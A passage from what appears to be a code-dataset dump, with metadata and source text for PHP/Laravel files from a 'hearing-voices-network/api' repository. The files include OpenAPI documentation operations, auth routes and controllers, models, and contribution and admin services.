"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Settings;\n\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Schemas\\Setting\\SettingsSchema;\nuse App\\Docs\\Schemas\\Setting\\UpdateSettingsSchema;\nuse App\\Docs\\Tags\\SettingsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\RequestBody;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\n\nclass UpdateSettingsOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_PUT)\n ->summary('Update the settings')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(SettingsTag::create())\n ->requestBody(\n RequestBody::create()->content(\n MediaType::json()->schema(UpdateSettingsSchema::create())\n )\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, SettingsSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.541100800037384,
"alphanum_fraction": 0.5418155789375305,
"avg_line_length": 21.206348419189453,
"blob_id": "143c561637a2cc9d225ffe3eb43efccad85f1da9",
"content_id": "a779500713c6ea57beba4ea769b095784f43f6b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1399,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 63,
"path": "/app/Providers/MacroServiceProvider.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Providers;\n\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Support\\ServiceProvider;\nuse Illuminate\\Validation\\Rule;\n\nclass MacroServiceProvider extends ServiceProvider\n{\n /**\n * Register services.\n */\n public function register(): void\n {\n $this->registerRequestMacros();\n $this->registerRuleMacros();\n }\n\n /**\n * Macros for the Request class.\n */\n protected function registerRequestMacros(): void\n {\n Request::macro('hasFilter', function (string $filter, $value = null): bool {\n $hasFilter = $this->has(\"filter.{$filter}\");\n\n if ($value === null) {\n return $hasFilter;\n }\n\n return $hasFilter && $this->input(\"filter.{$filter}\") === $value;\n });\n\n Request::macro('doesntHaveFilter', function (string $filter, $value = null): bool {\n return !$this->hasFilter($filter, $value);\n });\n }\n\n /**\n * Macros for the Rule class.\n */\n protected function registerRuleMacros(): void\n {\n Rule::macro('min', function (int $min): string {\n return \"min:{$min}\";\n });\n\n Rule::macro('max', function (int $max): string {\n return \"max:{$max}\";\n });\n }\n\n /**\n * Bootstrap services.\n */\n public function boot(): void\n {\n //\n }\n}\n"
},
{
"alpha_fraction": 0.5665990710258484,
"alphanum_fraction": 0.5686274766921997,
"avg_line_length": 25.89090919494629,
"blob_id": "f5b46b48b441ae8f2178a8508264423ffcdd756a",
"content_id": "14e8819f2578f7504610a90dfa289126ed651a2d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1479,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 55,
"path": "/app/Http/Controllers/Auth/EndUser/VerificationController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\Auth\\EndUser;\n\nuse App\\Http\\Controllers\\WebController;\nuse Illuminate\\Foundation\\Auth\\VerifiesEmails;\nuse Illuminate\\Http\\Request;\n\nclass VerificationController extends WebController\n{\n /*\n |--------------------------------------------------------------------------\n | Email Verification Controller\n |--------------------------------------------------------------------------\n |\n | This controller is responsible for handling email verification for any\n | user that recently registered with the application. Emails may also\n | be re-sent if the user didn't receive the original email message.\n |\n */\n\n use VerifiesEmails;\n\n /**\n * Where to redirect users after verification.\n *\n * @var string\n */\n protected $redirectTo = '/';\n\n /**\n * VerificationController constructor.\n */\n public function __construct()\n {\n $this->middleware('auth:web');\n $this->middleware('signed')->only('verify');\n $this->middleware('throttle:6,1')->only('verify', 'resend');\n }\n\n /**\n * Show the email verification notice.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Response\n */\n public function show(Request $request)\n {\n return $request->user('web')->hasVerifiedEmail()\n ? redirect($this->redirectPath())\n : view('end-user.auth.verify-email');\n }\n}\n"
},
{
"alpha_fraction": 0.5950782895088196,
"alphanum_fraction": 0.5961968898773193,
"avg_line_length": 29.827587127685547,
"blob_id": "7dcd6bc3a429f1082b40976bfc214aa34346b97d",
"content_id": "8d1e8d935eae8a7d7046d8b1020f27ff2f36a475",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 894,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 29,
"path": "/routes/passport.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Support\\Facades\\Route;\n\nRoute::namespace('App\\\\Http\\\\Controllers\\\\Passport')->group(\n function (): void {\n Route::get('/authorize', 'AuthorizationController@authorize')\n ->name('authorizations.authorize')\n ->middleware(['web', 'auth:web']);\n }\n);\n\nRoute::namespace('Laravel\\\\Passport\\\\Http\\\\Controllers')->group(\n function (): void {\n Route::post('/authorize', 'ApproveAuthorizationController@approve')\n ->name('authorizations.approve')\n ->middleware(['web', 'auth:web']);\n\n Route::delete('/authorize', 'DenyAuthorizationController@deny')\n ->name('authorizations.deny')\n ->middleware(['web', 'auth:web']);\n\n Route::post('/token', 'AccessTokenController@issueToken')\n ->name('token')\n ->middleware(['throttle']);\n }\n);\n"
},
{
"alpha_fraction": 0.5432020425796509,
"alphanum_fraction": 0.5435196757316589,
"avg_line_length": 36.03529357910156,
"blob_id": "33f4d0913c04b940a6d3831d86b9b73d846c8c5a",
"content_id": "692ecf1faf89ebe06d8e6b2d3dd4bf5467a836a9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3148,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 85,
"path": "/routes/web.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Support\\Facades\\Route;\n\n/*\n|--------------------------------------------------------------------------\n| Web Routes\n|--------------------------------------------------------------------------\n|\n| Here is where you can register web routes for your application. These\n| routes are loaded by the RouteServiceProvider within a group which\n| contains the \"web\" middleware group. Now create something great!\n|\n*/\n\nRoute::get('/', 'LandingController')\n ->name('landing');\n\nRoute::prefix('docs')\n ->group(\n function (): void {\n Route::get('/', 'DocsController@index')\n ->name('docs.index');\n Route::get('/openapi.json', 'DocsController@openApi')\n ->name('docs.openapi');\n }\n );\n\nRoute::prefix('auth/admin')\n ->as('auth.admin.')\n ->namespace('Auth\\\\Admin')\n ->group(\n function (): void {\n Route::get('login', 'LoginController@showLoginForm')\n ->name('login');\n Route::post('login', 'LoginController@login');\n Route::get('login/code', 'LoginController@showOtpForm')\n ->name('login.code');\n Route::post('login/code', 'LoginController@otp');\n Route::post('logout', 'LoginController@logout')\n ->name('logout');\n\n Route::get('password/reset', 'ForgotPasswordController@showLinkRequestForm')\n ->name('password.request');\n Route::post('password/email', 'ForgotPasswordController@sendResetLinkEmail')\n ->name('password.email');\n\n Route::get('password/reset/{token}', 'ResetPasswordController@showResetForm')\n ->name('password.reset');\n Route::post('password/reset', 'ResetPasswordController@reset')\n ->name('password.update');\n }\n );\n\nRoute::prefix('auth/end-user')\n ->as('auth.end-user.')\n ->namespace('Auth\\\\EndUser')\n ->group(\n function (): void {\n Route::get('login', 'LoginController@showLoginForm')\n ->name('login');\n Route::post('login', 'LoginController@login');\n Route::post('logout', 'LoginController@logout')\n ->name('logout');\n\n Route::get('password/reset', 'ForgotPasswordController@showLinkRequestForm')\n ->name('password.request');\n Route::post('password/email', 'ForgotPasswordController@sendResetLinkEmail')\n ->name('password.email');\n\n Route::get('password/reset/{token}', 'ResetPasswordController@showResetForm')\n ->name('password.reset');\n Route::post('password/reset', 'ResetPasswordController@reset')\n ->name('password.update');\n\n Route::get('email/verify', 'VerificationController@show')\n ->name('verification.notice');\n Route::get('email/verify/{id}', 'VerificationController@verify')\n ->name('verification.verify');\n Route::get('email/resend', 'VerificationController@resend')\n ->name('verification.resend');\n }\n );\n"
},
{
"alpha_fraction": 0.6708984375,
"alphanum_fraction": 0.671875,
"avg_line_length": 29.117647171020508,
"blob_id": "50ec7a7e679de25b5353e72c6708d67722b77560",
"content_id": "5a9c93a3395c04cd5c98023226a7303df815483a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1024,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 34,
"path": "/app/Docs/Operations/Admins/DestroyAdminOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Admins;\n\nuse App\\Docs\\Responses\\ResourceDeletedResponse;\nuse App\\Docs\\Tags\\AdminsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\n\nclass DestroyAdminOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_DELETE)\n ->summary('Delete a specific admin')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(AdminsTag::create())\n ->responses(\n ResourceDeletedResponse::create(null, 'admin')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6422487497329712,
"alphanum_fraction": 0.6439523100852966,
"avg_line_length": 19.964284896850586,
"blob_id": "67f6f04deafb3b6e8b1429aad4ca5f523f212e06",
"content_id": "b42dc3cf519b8c15eead8d43eb065970cf4759e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 587,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 28,
"path": "/app/Models/Notification.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\n\nclass Notification extends Model\n{\n use Mutators\\NotificationMutators;\n use Relationships\\NotificationRelationships;\n use Scopes\\NotificationScopes;\n\n const CHANNEL_EMAIL = 'email';\n const CHANNEL_SMS = 'sms';\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'sent_at' => 'datetime',\n 'created_at' => 'datetime',\n 'updated_at' => 'datetime',\n ];\n}\n"
},
{
"alpha_fraction": 0.6170212626457214,
"alphanum_fraction": 0.6180850863456726,
"avg_line_length": 20.363636016845703,
"blob_id": "18799df2fb8045638567e6843a79405dd4a90ca0",
"content_id": "78f5d556abdbc2c33f6626fc84689e1123649110",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 940,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 44,
"path": "/app/VariableSubstitution/Email/EndUser/PasswordResetSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\EndUser;\n\nuse App\\Models\\EndUser;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\n\nclass PasswordResetSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\EndUser\n */\n protected $endUser;\n\n /**\n * @var string\n */\n protected $passwordResetUrl;\n\n /**\n * PasswordResetSubstituter constructor.\n *\n * @param \\App\\Models\\EndUser $endUser\n * @param string $passwordResetUrl\n */\n public function __construct(EndUser $endUser, string $passwordResetUrl)\n {\n $this->endUser = $endUser;\n $this->passwordResetUrl = $passwordResetUrl;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'END_USER_EMAIL' => $this->endUser->user->email,\n 'PASSWORD_RESET_URL' => $this->passwordResetUrl,\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5995864868164062,
"alphanum_fraction": 0.6085458397865295,
"avg_line_length": 29.22916603088379,
"blob_id": "e3c112bd9b2fc0a433e8a7daf51cae240c025b1c",
"content_id": "7dfce835bb69a7d8cf84567ddd850ae16f539866",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1451,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 48,
"path": "/app/Http/Resources/TagResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Tag $resource\n */\nclass TagResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n return [\n 'id' => $this->resource->id,\n 'parent_tag_id' => $this->resource->parent_tag_id,\n 'name' => $this->resource->name,\n 'public_contributions_count' => $this->getPublicContributionsCount(),\n 'created_at' => $this->resource->created_at->toIso8601String(),\n 'updated_at' => $this->resource->updated_at->toIso8601String(),\n 'deleted_at' => optional($this->resource->deleted_at)->toIso8601String(),\n ];\n }\n\n /**\n * First attempts to use the relationship count attribute if appended.\n * Then attempt to use the count of the loaded relationships.\n * Finally resorts to querying the database for the count.\n *\n * @return int\n */\n protected function getPublicContributionsCount(): int\n {\n return $this->public_contributions_count ?? (int)$this->whenLoaded(\n 'publicContributions',\n count($this->resource->publicContributions),\n $this->resource->publicContributions()->count()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6340113878250122,
"alphanum_fraction": 0.6343368887901306,
"avg_line_length": 35.5773811340332,
"blob_id": "f4017a9ff5d2530ad4e995604805c754b41cef11",
"content_id": "6821bf1bb9c90876ef87b6b39b8a399ecde0ef7d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 6145,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 168,
"path": "/app/Http/Controllers/V1/ContributionController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Filters\\Contribution\\TagIdsFilter;\nuse App\\Http\\Requests\\Contribution\\IndexContributionRequest;\nuse App\\Http\\Requests\\Contribution\\StoreContributionRequest;\nuse App\\Http\\Requests\\Contribution\\UpdateContributionRequest;\nuse App\\Http\\Resources\\ContributionResource;\nuse App\\Http\\Responses\\ResourceDeletedResponse;\nuse App\\Models\\Contribution;\nuse App\\Services\\ContributionService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Database\\Eloquent\\Builder;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\Filter;\nuse Spatie\\QueryBuilder\\QueryBuilder;\n\nclass ContributionController extends ApiController\n{\n /**\n * @var \\App\\Services\\ContributionService\n */\n protected $contributionService;\n\n /**\n * ContributionController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\ContributionService $contributionService\n */\n public function __construct(\n Request $request,\n Pagination $pagination,\n ContributionService $contributionService\n ) {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified'])->except('index', 'show');\n $this->authorizeResource(Contribution::class);\n\n $this->contributionService = $contributionService;\n }\n\n /**\n * @param \\App\\Http\\Requests\\Contribution\\IndexContributionRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(IndexContributionRequest $request): ResourceCollection\n {\n $isGuest = $request->user('api') === null;\n $isEndUser = optional($request->user('api'))->isEndUser();\n $endUser = optional($request->user('api'))->endUser;\n\n $baseQuery = Contribution::query()\n ->with('tags.publicContributions')\n ->when($isGuest, function (Builder $query): void {\n // When guest, filter only public.\n $query->where('contributions.status', '=', Contribution::STATUS_PUBLIC);\n })\n ->when(\n $isEndUser && $request->doesntHaveFilter('end_user_id'),\n function (Builder $query) use ($endUser): void {\n // When end user, filter only public and all of own.\n $query->where('contributions.status', '=', Contribution::STATUS_PUBLIC)\n ->orWhere('contributions.end_user_id', '=', $endUser->id);\n }\n );\n\n $contributions = QueryBuilder::for($baseQuery)\n ->allowedFilters([\n Filter::exact('id'),\n Filter::exact('end_user_id'),\n Filter::custom('tag_ids', TagIdsFilter::class),\n ])\n ->allowedSorts([\n 'created_at',\n ])\n ->defaultSort('-created_at')\n ->paginate($this->perPage);\n\n event(EndpointInvoked::onRead($request, 'Viewed all contributions.'));\n\n return ContributionResource::collection($contributions);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Contribution\\StoreContributionRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function store(StoreContributionRequest $request): JsonResource\n {\n $contribution = DB::transaction(function () use ($request): Contribution {\n return $this->contributionService->create([\n 'end_user_id' => $request->user('api')->endUser->id,\n 'content' => $request->input('content'),\n 'status' => $request->status,\n 'tags' => $request->input('tags.*.id'),\n ]);\n });\n\n event(EndpointInvoked::onCreate($request, \"Created contribution [{$contribution->id}].\"));\n\n return new ContributionResource($contribution);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Contribution $contribution\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Contribution $contribution): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed contribution [{$contribution->id}].\"));\n\n return new ContributionResource(\n $contribution->load('tags.publicContributions')\n );\n }\n\n /**\n * @param \\App\\Http\\Requests\\Contribution\\UpdateContributionRequest $request\n * @param \\App\\Models\\Contribution $contribution\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function update(\n UpdateContributionRequest $request,\n Contribution $contribution\n ): JsonResource {\n $contribution = DB::transaction(function () use ($request, $contribution): Contribution {\n return $this->contributionService->update($contribution, [\n 'content' => $request->input('content'),\n 'status' => $request->status,\n 'tags' => $request->input('tags.*.id'),\n ]);\n });\n\n event(EndpointInvoked::onUpdate($request, \"Updated contribution [{$contribution->id}].\"));\n\n return new ContributionResource(\n $contribution->load('tags.publicContributions')\n );\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Contribution $contribution\n * @return \\App\\Http\\Responses\\ResourceDeletedResponse\n */\n public function destroy(Request $request, Contribution $contribution): ResourceDeletedResponse\n {\n DB::transaction(function () use ($contribution): void {\n $this->contributionService->delete($contribution);\n });\n\n event(EndpointInvoked::onDelete($request, \"Deleted contribution [{$contribution->id}].\"));\n\n return new ResourceDeletedResponse('contribution');\n }\n}\n"
},
{
"alpha_fraction": 0.5720250606536865,
"alphanum_fraction": 0.5725469589233398,
"avg_line_length": 38.91666793823242,
"blob_id": "6e368fe4e0ea36fcdcf89d701666ac254f7dc2c4",
"content_id": "9ad6f8e00bcf7f0a5d9564b5a728999618ec95db",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1916,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 48,
"path": "/app/Docs/Schemas/Contribution/ContributionSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\Contribution;\n\nuse App\\Docs\\Schemas\\Tag\\TagSchema;\nuse App\\Models\\Contribution;\nuse App\\Support\\Enum;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass ContributionSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('end_user_id')\n ->format(static::FORMAT_UUID)\n ->description('This is only provided when the requesting user is an admin or the same end user.'),\n Schema::string('content'),\n Schema::string('excerpt'),\n Schema::string('status')\n ->enum(...(new Enum(Contribution::class))->getValues('STATUS')),\n Schema::string('changes_requested')\n ->description('This is only provided when the requesting user is an admin or the same end user.')\n ->nullable(),\n Schema::string('status_last_updated_at')\n ->format(static::FORMAT_DATE_TIME)\n ->description('This is only provided when the requesting user is an admin or the same end user.'),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('updated_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::array('tags')\n ->items(TagSchema::create())\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6736053228378296,
"alphanum_fraction": 0.674437940120697,
"avg_line_length": 24.553192138671875,
"blob_id": "6b2e6e8d458d0aef34358446fe12d8c2d3639a8f",
"content_id": "550f7006447ba62e643e46f8cf13712f39bac278",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1201,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 47,
"path": "/app/Models/Relationships/TagRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\Contribution;\nuse App\\Models\\Tag;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasMany;\n\ntrait TagRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function parentTag(): BelongsTo\n {\n return $this->belongsTo(Tag::class, 'parent_tag_id');\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function childTags(): HasMany\n {\n return $this->hasMany(Tag::class, 'parent_tag_id');\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany\n */\n public function contributions(): BelongsToMany\n {\n return $this->belongsToMany(Contribution::class, 'contribution_tag');\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany\n */\n public function publicContributions(): BelongsToMany\n {\n return $this->contributions()\n ->where('contributions.status', '=', Contribution::STATUS_PUBLIC);\n }\n}\n"
},
{
"alpha_fraction": 0.6157556176185608,
"alphanum_fraction": 0.618971049785614,
"avg_line_length": 16.77142906188965,
"blob_id": "401868f3926eb9cff4191c3b4b482bf71445e212",
"content_id": "5fe34eb2d0b0fd848d5cd61394250825c1d7a29c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 622,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 35,
"path": "/app/Models/Country.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\n\nclass Country extends Model\n{\n use Mutators\\CountryMutators;\n use Relationships\\CountryRelationships;\n use Scopes\\CountryScopes;\n\n /**\n * Indicates if the IDs are UUIDs.\n *\n * @var bool\n */\n protected $keyIsUuid = false;\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * The primary key for the model.\n *\n * @var string\n */\n protected $primaryKey = 'alpha_2';\n}\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.6875,
"avg_line_length": 15,
"blob_id": "82cd6e772c07c999a66239799730d8acdd293d73",
"content_id": "03622768d0e658312dac9e04c807a32c0a86785c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 32,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 2,
"path": "/docker/troposphere/requirements.txt",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "troposphere==2.5.3\nawacs==0.8.1\n"
},
{
"alpha_fraction": 0.6963788270950317,
"alphanum_fraction": 0.6991643309593201,
"avg_line_length": 17.894737243652344,
"blob_id": "4c04627677f8502e179bc40d3144771ad415a501",
"content_id": "8ebc3b0cb69df7aca019b9223bdbb550707bda22",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 359,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 19,
"path": "/app/Models/Relationships/FileRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\FileToken;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasMany;\n\ntrait FileRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function fileTokens(): HasMany\n {\n return $this->hasMany(FileToken::class);\n }\n}\n"
},
{
"alpha_fraction": 0.5116396546363831,
"alphanum_fraction": 0.5121457576751709,
"avg_line_length": 24.012659072875977,
"blob_id": "249c995e79cc7d72aa49c145381c72758b40dbbe",
"content_id": "783a8cde2f61e3053029bb428975e674a15e728d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1976,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 79,
"path": "/app/Services/AdminService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Admin\\AdminCreated;\nuse App\\Events\\Admin\\AdminDeleted;\nuse App\\Events\\Admin\\AdminUpdated;\nuse App\\Models\\Admin;\nuse App\\Models\\User;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Hash;\n\nclass AdminService\n{\n /**\n * @param array $data\n * @return \\App\\Models\\Admin\n */\n public function create(array $data): Admin\n {\n /** @var \\App\\Models\\Admin $admin */\n $admin = Admin::create([\n 'name' => $data['name'],\n 'phone' => $data['phone'],\n 'user_id' => User::create([\n 'email' => $data['email'],\n 'password' => Hash::make($data['password']),\n 'email_verified_at' => Date::now(),\n ])->id,\n ]);\n\n event(new AdminCreated($admin));\n\n return $admin;\n }\n\n /**\n * @param \\App\\Models\\Admin $admin\n * @param array $data\n * @return \\App\\Models\\Admin\n */\n public function update(Admin $admin, array $data): Admin\n {\n $admin->update([\n 'name' => $data['name'] ?? $admin->name,\n 'phone' => $data['phone'] ?? $admin->phone,\n ]);\n\n $admin->user->update([\n 'email' => $data['email'] ?? $admin->user->email,\n 'password' => $data['password'] !== null\n ? Hash::make($data['password'])\n : $admin->user->password,\n ]);\n\n event(new AdminUpdated($admin));\n\n return $admin;\n }\n\n /**\n * @param \\App\\Models\\Admin $admin\n * @throws \\Exception\n */\n public function delete(Admin $admin): void\n {\n /** @var \\App\\Models\\User $user */\n $user = $admin->user;\n $admin->delete();\n $user->audits()->delete();\n $user->notifications()->delete();\n $user->fileToken()->delete();\n $user->forceDelete();\n\n event(new AdminDeleted($admin));\n }\n}\n"
},
{
"alpha_fraction": 0.46038544178009033,
"alphanum_fraction": 0.4614560902118683,
"avg_line_length": 25.685714721679688,
"blob_id": "77ce206754ca4e158596dd7b49550939385525f7",
"content_id": "6575183973d0ba80e312a2b0cb5e4441a7b615ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 934,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 35,
"path": "/app/Http/Requests/Contribution/IndexContributionRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
